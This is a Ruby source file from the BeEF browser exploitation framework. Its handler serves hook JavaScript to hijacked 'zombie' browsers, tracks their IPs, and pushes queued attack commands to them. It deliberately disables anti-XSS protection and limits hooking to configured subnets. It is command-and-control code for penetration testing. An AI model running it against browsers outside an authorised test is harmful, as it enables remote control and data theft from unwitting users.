1
#
2
# Copyright (c) 2006-2026 Wade Alcorn - [email protected]
3
# Browser Exploitation Framework (BeEF) - https://beefproject.com
4
# See the file 'doc/COPYING' for copying permission
5
#
6
module BeEF
7
  module Core
8
    module Handlers
9
      # @note This class handles connections from hooked browsers to the framework.
10
      class HookedBrowsers < BeEF::Core::Router::Router
11
        include BeEF::Core::Handlers::Modules::BeEFJS
12
        include BeEF::Core::Handlers::Modules::MultiStageBeEFJS
13
        include BeEF::Core::Handlers::Modules::LegacyBeEFJS
14
        include BeEF::Core::Handlers::Modules::Command
15

16
        # antisnatchor: we don't want to have anti-xss/anti-framing headers in the HTTP response for the hook file.
17
        configure do
18
          disable :protection
19
        end
20

21
        # Generate the hook js provided to the hookwed browser (the magic happens here)
22
        def confirm_browser_user_agent(user_agent)
23
          browser_type = user_agent.split(' ').last # selecting just name/version of browser
24
          # does the browser already exist in the legacy database / object? Return true if yes
25
          # browser and therefore which version of the hook file to generate and use
26
          BeEF::Core::Models::LegacyBrowserUserAgents.user_agents.each do |ua_string|
27
            return true if ua_string.include? browser_type
28
          end
29
          false
30
        end
31

32
        # Process HTTP requests sent by a hooked browser to the framework.
33
        # It will update the database to add or update the current hooked browser
34
        # and deploy some command modules or extensions to the hooked browser.
35
        get '/' do
36
          @body = ''
37
          params = request.query_string
38
          # @response = Rack::Response.new(body=[], 200, header={})
39
          config = BeEF::Core::Configuration.instance
40

41
          # @note check source ip address of browser
42
          permitted_hooking_subnet = config.get('beef.restrictions.permitted_hooking_subnet')
43
          if permitted_hooking_subnet.nil? || permitted_hooking_subnet.empty?
44
            BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from outside of permitted hooking subnet (#{request.ip}) rejected.")
45
            error 404
46
          end
47

48
          found = false
49
          permitted_hooking_subnet.each do |subnet|
50
            found = true if IPAddr.new(subnet).include?(request.ip)
51
          end
52

53
          unless found
54
            BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from outside of permitted hooking subnet (#{request.ip}) rejected.")
55
            error 404
56
          end
57

58
          excluded_hooking_subnet = config.get('beef.restrictions.excluded_hooking_subnet')
59
          unless excluded_hooking_subnet.nil? || excluded_hooking_subnet.empty?
60
            excluded_ip_hooked = false
61

62
            excluded_hooking_subnet.each do |subnet|
63
              excluded_ip_hooked = true if IPAddr.new(subnet).include?(request.ip)
64
            end
65

66
            if excluded_ip_hooked
67
              BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from excluded hooking subnet (#{request.ip}) rejected.")
68
              error 404
69
            end
70
          end
71

72
          # @note get zombie if already hooked the framework
73
          hook_session_name = config.get('beef.http.hook_session_name')
74
          hook_session_id =
75
            if request.respond_to?(:[])
76
              request[hook_session_name]
77
            else
78
              request.params[hook_session_name] || request.env[hook_session_name]
79
            end
80
          begin
81
            raise ActiveRecord::RecordNotFound if hook_session_id.nil?
82

83
            hooked_browser = BeEF::Core::Models::HookedBrowser.where(session: hook_session_id).first
84
          rescue ActiveRecord::RecordNotFound
85
            hooked_browser = false
86
          end
87

88
          # @note is a new browser so return instructions to set up the hook
89
          if hooked_browser
90
            # @note Check if we haven't seen this browser for a while, log an event if we haven't
91
            if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
92
              BeEF::Core::Logger.instance.register('Zombie', "#{hooked_browser.ip} appears to have come back online", hooked_browser.id.to_s)
93
            end
94

95
            # @note record the last poll from the browser
96
            hooked_browser.lastseen = Time.new.to_i
97

98
            # @note Check for a change in zombie IP and log an event
99
            if config.get('beef.http.allow_reverse_proxy') == true
100
              if hooked_browser.ip != request.env['HTTP_X_FORWARDED_FOR']
101
                BeEF::Core::Logger.instance.register('Zombie', "IP address has changed from #{hooked_browser.ip} to #{request.env['HTTP_X_FORWARDED_FOR']}", hooked_browser.id.to_s)
102
                hooked_browser.ip = request.env['HTTP_X_FORWARDED_FOR']
103
              end
104
            elsif hooked_browser.ip != request.ip
105
              BeEF::Core::Logger.instance.register('Zombie', "IP address has changed from #{hooked_browser.ip} to #{request.ip}", hooked_browser.id.to_s)
106
              hooked_browser.ip = request.ip
107
            end
108

109
            hooked_browser.count!
110
            hooked_browser.save!
111

112
            # @note add all available command module instructions to the response
113
            zombie_commands = BeEF::Core::Models::Command.where(hooked_browser_id: hooked_browser.id, instructions_sent: false)
114
            zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
115

116
            # @note Check if there are any ARE rules to be triggered. If is_sent=false rules are triggered
117
            are_executions = BeEF::Core::Models::Execution.where(is_sent: false, session_id: hook_session_id)
118
            are_executions.each do |are_exec|
119
              @body += are_exec.mod_body
120
              are_exec.update(is_sent: true, exec_time: Time.new.to_i)
121
            end
122

123
            # @note We dynamically get the list of all browser hook handler using the API and register them
124
            BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, params, request, response)
125
          else
126

127
            # @note generate the instructions to hook the browser
128
            host_name = request.host
129
            unless BeEF::Filters.is_valid_hostname?(host_name)
130
              (print_error 'Invalid host name'
131
              return)
132
            end
133

134
            # Generate the hook js provided to the hookwed browser (the magic happens here)
135
            if BeEF::Core::Configuration.instance.get('beef.http.websocket.enable')
136
              print_debug 'Using WebSocket'
137
              build_beefjs!(host_name)
138
            elsif confirm_browser_user_agent(request.user_agent)
139
              print_debug 'Using multi_stage_beefjs'
140
              multi_stage_beefjs!(host_name)
141
            else
142
              print_debug 'Using legacy_build_beefjs'
143
              legacy_build_beefjs!(host_name)
144
            end
145
            # @note is a known browser so send instructions
146
          end
147

148
          # @note set response headers and body
149
          headers  'Pragma' => 'no-cache',
150
                   'Cache-Control' => 'no-cache',
151
                   'Expires' => '0',
152
                   'Content-Type' => 'text/javascript',
153
                   'Access-Control-Allow-Origin' => '*',
154
                   'Access-Control-Allow-Methods' => 'POST, GET'
155
          @body
156
        end
157
      end
158
    end
159
  end
160
end
161

162